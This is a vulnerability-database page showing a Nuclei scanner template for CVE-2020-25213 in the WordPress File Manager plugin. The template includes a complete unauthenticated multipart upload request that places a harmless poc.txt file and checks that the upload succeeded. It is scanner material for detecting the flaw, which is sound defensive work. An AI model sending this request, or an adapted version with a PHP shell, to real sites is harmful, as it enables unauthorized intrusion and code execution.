Lucene search

ProjectDiscoveryNUCLEI:CVE-2020-25213

HistoryFeb 11, 2021 - 7:18 p.m.

WordPress File Manager Plugin - Remote Code Execution

2021-02-1119:18:25

ProjectDiscovery

github.com

cve

cve2020

wordpress

rce

fileupload

infosec

vulnerability

exploit

webdesi9

packetstorm

remote code execution

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.975

Percentile

100.0%

JSON

The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.

id: CVE-2020-25213

# Uploaded file will be accessible at:-
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info:
  name: WordPress File Manager Plugin - Remote Code Execution
  author: foulenzer
  severity: critical
  description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
  remediation: |
    Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability.
  reference:
    - https://plugins.trac.wordpress.org/changeset/2373068
    - https://github.com/w4fz5uck5/wp-file-manager-0day
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25213
    - http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-25213
    cwe-id: CWE-434
    epss-score: 0.97395
    epss-percentile: 0.99916
    cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: webdesi9
    product: file_manager
    framework: wordpress
  tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9

http:
  - raw:
      - |
        POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48

        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="reqid"

        17457a1fe6959
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="cmd"

        upload
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="target"

        l1_Lw
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="mtime[]"

        1576045135
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="upload[]"; filename="poc.txt"
        Content-Type: text/plain

        poc-test
        --------------------------ca81ac1fececda48--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - poc.txt
          - added
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f81ace544937588a6d8d8eb3e27477753548e12b0bc8be2225c631fbe79db914022100f85f3adefb3718f509c523fb5addf2ed503818ce0bd802055f6c5ae9469ab7d8:922c64590222798bb761d5b6d8e72950